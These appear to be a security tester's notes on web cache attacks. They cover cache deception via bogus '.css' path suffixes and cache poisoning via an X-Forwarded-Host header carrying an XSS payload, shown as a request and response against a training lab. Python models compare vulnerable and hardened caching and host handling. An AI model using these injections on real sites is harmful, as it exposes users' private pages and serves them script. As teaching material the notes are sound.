Cache

Things to check:
- Check Response Headers for Cache Information
- Send a request with a malformed header, then repeat the request with the header set normally; if the same HTTP error code comes back, the cache stored the error response and is now serving it to everyone

Cache Deception Attack

Web servers and caching proxies often decide whether to cache a response from the file extension in the requested URL, not from the response itself.

Example URL: https://www.example.com/account.php/nonexistent.css

How it works:
1. Check whether the server returns the content of home.php when https://www.example.com/home.php/nonexistent.css is requested (the application ignores the trailing path segment, but the cache sees a .css extension and stores the page).
2. Have an authenticated user trigger that URL.
3. Have a non-authenticated user trigger that URL afterwards.
- Check whether the non-authenticated user sees the information cached from the authenticated user's response.

This can be mitigated with an Edge Cache TTL setting.
It can also be solved by returning a 404 or 302 for such URLs instead of the dynamic page.
Cache files by their content type rather than by the URL's file extension.
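The difference between the two cache policies, as an added example that is not part of the original notes: a small model of a cache sitting in front of an application. The origin, the cache, the paths and the user names are all constructed for the demo. It shows that keying the cache decision on the URL's extension stores the authenticated page under /account.php/nonexistent.css, that deciding on the response Content-Type does not, and that an origin which answers 404 for the bogus path is safe even behind an extension-keyed cache.

```python
"""Model of web cache deception: extension-keyed vs content-type-keyed caching.

Added example; the application, cache and data here are constructed, not taken
from any real server.
"""
import posixpath

STATIC_EXTENSIONS = {".css", ".js", ".png", ".jpg", ".ico"}
STATIC_CONTENT_TYPES = {"text/css", "application/javascript", "image/png"}


def lenient_app(path, user):
    """Constructed origin that routes on the first path segment and, like many
    frameworks, ignores trailing path info ('/account.php/x.css' -> '/account.php')."""
    script = "/" + path.lstrip("/").split("/", 1)[0]
    if script == "/account.php":
        if user is None:
            return 302, "text/html", "redirect to login"
        return 200, "text/html", f"<p>Account page for {user}</p>"
    if script == "/style.css":
        return 200, "text/css", "body { color: black }"
    return 404, "text/html", "not found"


def strict_app(path, user):
    """Constructed origin that only serves exact paths; extra path info is a 404
    (the '404 or 302' mitigation)."""
    if path in ("/account.php", "/style.css"):
        return lenient_app(path, user)
    return 404, "text/html", "not found"


def cacheable_by_extension(path, status, ctype, body):
    """Cache whatever looks static from the URL alone (the weak policy)."""
    return posixpath.splitext(path)[1] in STATIC_EXTENSIONS


def cacheable_by_content_type(path, status, ctype, body):
    """Cache only successful responses whose Content-Type is a static type."""
    return status == 200 and ctype in STATIC_CONTENT_TYPES


class Cache:
    """Minimal shared cache keyed on the path only (no per-user keying)."""

    def __init__(self, policy, origin=lenient_app):
        self.policy = policy
        self.origin = origin
        self.store = {}

    def fetch(self, path, user):
        if path in self.store:
            return self.store[path] + ("HIT",)
        status, ctype, body = self.origin(path, user)
        if self.policy(path, status, ctype, body):
            self.store[path] = (status, ctype, body)
        return status, ctype, body, "MISS"


def deception_leaks(policy, origin=lenient_app):
    """True if an anonymous visitor receives the authenticated user's page
    from the cache after that user requested the deceptive URL."""
    cache = Cache(policy, origin)
    url = "/account.php/nonexistent.css"
    cache.fetch(url, user="alice")            # victim, logged in
    status, ctype, body, source = cache.fetch(url, user=None)  # anonymous visitor
    return source == "HIT" and "alice" in body


def static_asset_cached(policy, origin=lenient_app):
    """True if a genuine static asset is still served from cache on the second request."""
    cache = Cache(policy, origin)
    cache.fetch("/style.css", user=None)
    return cache.fetch("/style.css", user=None)[3] == "HIT"


if __name__ == "__main__":
    print("extension policy leaks:   ", deception_leaks(cacheable_by_extension))
    print("content-type policy leaks:", deception_leaks(cacheable_by_content_type))
    print("strict origin leaks:      ", deception_leaks(cacheable_by_extension, strict_app))
```

Both policies still cache the real stylesheet, so moving the decision to the Content-Type costs nothing for legitimate static assets; the per-user page is never stored because its type is text/html. Whether a shared cache is permitted to key on the path alone is the other half of the problem, which is why an authenticated response should also carry Cache-Control: private or no-store.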

Cache Poisoning

Cache poisoning is used as an add-on to another attack: the cache stores the malicious response and serves it to other users for as long as the entry lives.

The attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.

Basic Example

Make a first request carrying the XSS payload, then make a regular request that any user would make and check whether the poisoned response is served from the cache.

Using the X-Forwarded-Host header to inject into the page:

GET /basic.php HTTP/2
Host: 51b26edb.poison.digi.ninja:2443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://poison.digi.ninja/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-Host: example.com"><script>alert(1)</script><meta "

Results:

HTTP/2 200 OK
date: Sat, 17 Jul 2021 21:43:01 GMT
server: Apache
strict-transport-security: max-age=63072000
vary: Accept-Encoding
content-encoding: gzip
x-content-type-options: nosniff
content-length: 604
content-type: text/html; charset=UTF-8
x-varnish: 128353
age: 0
via: 1.1 varnish (Varnish/6.1)
accept-ranges: bytes
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<title>Basic - Cache Poisoning Lab</title>
	<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" /> 
	<link rel="apple-touch-icon" href="/apple-touch-icon.png" />
	<meta property="og:title" content="Basic Poisoning Lab" />
	<meta property="og:type" content="website" />
	<meta property="og:image" content="http://example.com"><script>alert(1)</script><meta "/cms/social.png" />
</head>
<body>
	<h1>Basic Poisoning Lab</h1>
	<p>A random number is: 2041613932</p>
	<p>
		This page loads its open graph image based on the host requested but isn't that clever when working out the host to use.
	</p>
	<p>
		Use this weakness to poison every visitor with a nice bit of Cross-Site Scripting.
	</p>
	<p><a href="/index.php">&laquo; Back to home</a></p>
	<hr />
	<p>
		Lab created by Robin Wood - <a href="https://digi.ninja">DigiNinja</a>
	</p>
</body>
</html>
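The pattern behind the request and response above, written vulnerable and hardened side by side, as an added example that is not the lab's code: a page that builds its og:image URL from X-Forwarded-Host. The allow-list, header sets and host names are constructed for the demo; the hostile value uses a harmless tag rather than a script so the output stays readable.

```python
"""og:image built from X-Forwarded-Host: vulnerable vs hardened rendering.

Added example; the allow-list and header dictionaries are constructed.
"""
import html
import re

# Constructed allow-list of hosts this application is actually served as.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
CANONICAL_HOST = "www.example.com"

# A host name is letters, digits, dots and hyphens, optionally with a port.
_HOST_RE = re.compile(r"^[a-z0-9.-]+(:\d+)?$", re.IGNORECASE)


def effective_host_vulnerable(headers):
    """Trusts X-Forwarded-Host verbatim when present (the lab's weakness)."""
    return headers.get("X-Forwarded-Host", headers["Host"])


def effective_host_hardened(headers):
    """Honours X-Forwarded-Host only when it is syntactically a host name and
    on the allow-list; anything else falls back to the canonical host."""
    candidate = headers.get("X-Forwarded-Host", "")
    if _HOST_RE.match(candidate) and candidate.lower().split(":")[0] in ALLOWED_HOSTS:
        return candidate
    return CANONICAL_HOST


def render_vulnerable(headers):
    host = effective_host_vulnerable(headers)
    return f'<meta property="og:image" content="http://{host}/cms/social.png" />'


def render_hardened(headers):
    host = effective_host_hardened(headers)
    # Escaping is a second layer; the host has already been validated above.
    return f'<meta property="og:image" content="http://{html.escape(host, quote=True)}/cms/social.png" />'


def tag_is_intact(markup):
    """True if the output is still exactly one meta tag with no extra markup."""
    return markup.count("<") == 1 and markup.count(">") == 1


# Constructed header sets: a normal visitor and a request with a hostile override.
NORMAL = {"Host": "www.example.com"}
LEGIT_OVERRIDE = {"Host": "www.example.com", "X-Forwarded-Host": "example.com"}
HOSTILE = {"Host": "www.example.com", "X-Forwarded-Host": 'evil.example"><b>injected</b><meta "'}


if __name__ == "__main__":
    print("vulnerable, hostile:", render_vulnerable(HOSTILE))
    print("hardened,   hostile:", render_hardened(HOSTILE))
```

Validation alone closes the injection, but it does not fix the cache: a response that depends on X-Forwarded-Host must either be keyed on it (the cache's vary rules) or, better, the edge should drop the header before it reaches the origin so that every cached copy is built from the canonical host.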

Regular User Request:


Original URL Example

X-Original-URL: https:\samcurry.net/please//work